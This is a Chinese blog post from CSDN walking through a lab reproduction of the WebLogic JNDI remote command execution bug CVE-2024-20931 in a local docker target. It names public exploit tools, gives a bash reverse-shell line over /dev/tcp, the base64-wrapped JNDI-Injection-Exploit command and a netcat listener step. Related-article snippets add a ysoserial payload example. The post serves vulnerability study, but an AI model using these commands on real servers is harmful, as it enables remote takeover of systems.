Weblogic Server JNDI命令执行漏洞复现

已于 2024-03-04 18:59:56 修改
阅读量317 收藏 2
点赞数 9
文章标签: web安全
于 2024-03-04 18:55:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xxxtentaction24/article/details/136459320
版权

1.需要准备一个kali机(作为靶机)以及一个攻击机(可以选择windows虚拟机)

第一步:安装存在漏洞的镜像

docker pull ismaleiva90/weblogic12

第二步:启动docker镜像

docker run -dit -p 7001:7001 -p 7002:7002 --restart=always ismaleiva90/weblogic12:latest

第三步:利用工具进行exp利用

代码:java -jar CVE-2024-20931.jar(下载地址:https://github.com/dinosn/CVE-2024-20931

第一个填写靶机的ip

第二个填写对应的端口

第三个填写JNDI的恶意构造的内容

第四步:使用jndi软件并运行进行注入(JNDI下载地址:https://github.com/welk1n/JNDI-Injection-Exploit)

bash -i >& /dev/tcp/①/② 0>&1

①处填入攻击机的ip

②处填入你需要监听的端口号

最后对上面进行base64加密

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,此处填写加密的东西} | {base64,-d} | {bash, -i }" -A "攻击机ip"

第五步:进行nc对JNDI对应的端口进行监听(nc软件电脑本身不自带需要去官网进行下载:https://eternallybored.org/misc/netcat/

第六步:将恶意的服务地址填入工具中

需要填入恶意地址为箭头所指的地方

第七步:监听成功

复现成功

注:在同一个机子上面运行攻击机需要的软件

xxxtentaction24
关注
  • 9
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WebLogic Server JNDI注入漏洞复现(CVE-2024-20931)
0xSec
02-23 1881
在Oracle发布的2024年1月补丁中,成功修复了一个基于Weblogic T3\IIOP协议的远程命令执行漏洞CVE-2024-20931,该漏洞是由于 CVE-2023-21839 漏洞未修补完全,未经身份验证的攻击者通过 T3、IIOP进行网络访问来破坏 Oracle WebLogic Server。成功利用此漏洞可能会导致 Oracle WebLogic Server 被接管。
WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
0xSec
02-11 5346
WebLogic存在远程代码执行漏洞,该漏洞允许未经身份验证的远程攻击者通过T3/IIOP协议网络访问并破坏易受攻击的WebLogic服务器,成功利用此漏洞可能导致Oracle WebLogic服务器被接管或敏感信息泄露。
Weblogic Server JNDI命令执行漏洞复现(1),2024年最新零基础网络安全入门
2401_83974087的博客
04-18 399
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,此处填写加密的东西} | {base64,-d} | {bash, -i }” -A “攻击机ip”对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。第三个填写JNDI的恶意构造的内容。第一步:安装存在漏洞的镜像。第一个填写靶机的ip。第二个填写对应的端口。①处填入攻击机的ip。
Weblogic Server JNDI命令执行漏洞复现,一线互联网架构师筑基必备技能之网络安全
2401_84184638的博客
04-10 947
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
Weblogic Server远程代码执行漏洞(CVE-2021-2109 )复现
m0_58596609的博客
12-28 2667
Weblogic Server远程代码执行漏洞(CVE-2021-2109 ) 含 JNDIExploit.v1.11.jar 以及POC
漏洞复现WebLogic Server 远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389)
做自己喜欢的事,并将其发挥到极致!
03-20 733
WebLogic Server 存在远程代码执行漏洞,由于WebLogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server漏洞利用成功WebLogic Server 可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据信息泄露。
oracle11g远程命令执行漏洞,漏洞应急|Oracle Weblogic Server远程代码执行漏洞(CVE-2021-2109)...
weixin_32958777的博客
04-03 886
近日,锐捷网络CERT安全应急响应团队关注到Oracle官方发布了2021年1月关键补丁更新公告,该补丁中修补了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。在CVE-2021-2109漏洞中,攻击者可构造恶意请求,造成JNDI注入、执行任意代码,从而控制服务器。针对以上漏洞,锐捷安全能够进行漏洞扫描与检测,并做安全防护。漏洞复现环境:We...
Oracle WebLogic Server远程代码执行漏洞 CVE-2020-14750 已亲自复现_cve-2020-14750漏洞复现
2401_84545046的博客
05-17 632
Oracle Fusion Middleware的Oracle WebLogic Server产品中的漏洞(组件:控制台),允许未经身份验证的攻击者通过HTTP访问网络,从而导致Oracle WebLogic Server被接管。这里我是在虚拟机里面进行登录的,下面的验证是在本机进行验证的。环境启动后,访问http://192.168.63.129:7001/console/login/LoginForm.jsp,说明已成功启动。但是,使用其他浏览器发现绕过失败,使用下面的payload可以绕过。
[Vulhub] Weblogic 漏洞复现
weixin_45605352的博客
09-11 2664
Weblogic 反序列化远程代码执行漏洞(CVE-2019-2725) 0x00 漏洞描述 Weblogic反序列化远程代码执行漏洞。由于在反序列化处理输入信息的过程中存在缺陷,未经授权的攻击者可以发送特意构造的恶意HTTP请求,利用该漏洞获取服务器权限,实现远程代码执行。 0x01 影响版本 Oracle WebLogic Server 10.* Oracle WebLogic Server 12.1.3 0x03 漏洞分析 该漏洞存在于wls9-async组件,该组件为异步通讯服务,攻击者可以在/
weblogic cmd命令漏洞检测
04-08
WebLogic CMD命令漏洞检测主要涉及的是Oracle WebLogic Server安全性,这是一个广泛应用的企业级Java应用服务器。此漏洞利用了WebLogic服务器中的反序列化机制,允许攻击者通过精心构造的恶意输入来执行任意系统...
Weblogic Server远程代码执行.docx
01-25
2021年1月20日,Oracle官方发布了漏洞补丁,修了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制...
网络安全常见错误及解决办法(更新中)
qq_42041946的博客
07-22 525
设置一下wwwtest访问权限做负载均衡使用火狐浏览器访问一直访问一个页面,使用谷歌就正常两个也轮换,是火狐浏览器的问题在nginx的配置文件里改站点根目录,但是网页报了403 Forbidden,重安装了个centos也不行强制刷新过了,改回相对路径html才可以。答:403就是没有权限 再/web这个文件夹下chown -R nginx:nginx .(如果不行就看看你的selinux 有没有关闭,vim /etc/selinux/config 看看是不是disabled。
等级保护 总结2
最新发布
qq_25467441的博客
07-24 402
FireHunter 6000是华为公司推出的高性能APT威胁检测系统,利用多引擎虚拟检测技术以及传统的安全检测技术,基于行为特征检测,识别网络中传输的恶意文件和C&C攻击,有效避免未知威胁攻击的扩散和企业核心信息资产损失。AntiDDoS管理等功能,支持安全功能服务化、可视化,协同网络、安全设备和大数据智能分析系统形成全面威胁感知、分析和响应的整网主动安全防护体系。安全态势感知系统协同网络和安全实现威胁自动近源处置,提升威胁处置效率,缩小威胁横向扩散的范围,降低威胁对业务的影响。
网络安全相关竞赛比赛
黑战士的博客
07-18 974
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
“微软蓝屏”事件:网络安全与系统稳定性的深刻反思
tian362的专栏
07-23 495
面对软件更新流程中的风险管理和质量控制问题、预防类似大规模故障的需求以及跨领域连锁反应的行业影响,我们需要从多个方面入手,加强风险识别与评估、完善测试流程、实施严格的质量控制措施、设计冗余系统、实施灾难恢复计划、建立高可用架构、利用自动化工具和监控系统以及加强跨行业合作等。通过部署多个相互独立的系统组件,可以在某个组件发生故障时,由其他组件接管其工作,从而确保系统整体的连续性和稳定性。在“微软蓝屏”事件中,微软的视窗系统作为众多行业信息系统的基石,其故障迅速波及到了多个领域,造成了广泛的影响。
weblogic反序列化漏洞复现
10-16
weblogic反序列化漏洞是一种比较严重的安全漏洞,攻击者可以利用该漏洞执行任意代码。下面是一个简单的漏洞复现过程: 1. 下载ysoserial工具,生成一个恶意的序列化数据,例如: ``` java -jar ysoserial.jar CommonsCollections1 'ping your_ip' > payload.bin ``` 2. 将payload.bin上传到目标服务器上,并执行以下命令: ``` java -cp weblogic.jar weblogic.jms.common.StreamMessageImpl payload.bin ``` 3. 等待目标服务器执行ping命令。 需要注意的是,该漏洞只存在于WebLogic 10.3.6.0.0之前的版本中。如果您使用的是较新的版本,则不受此漏洞的影响。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值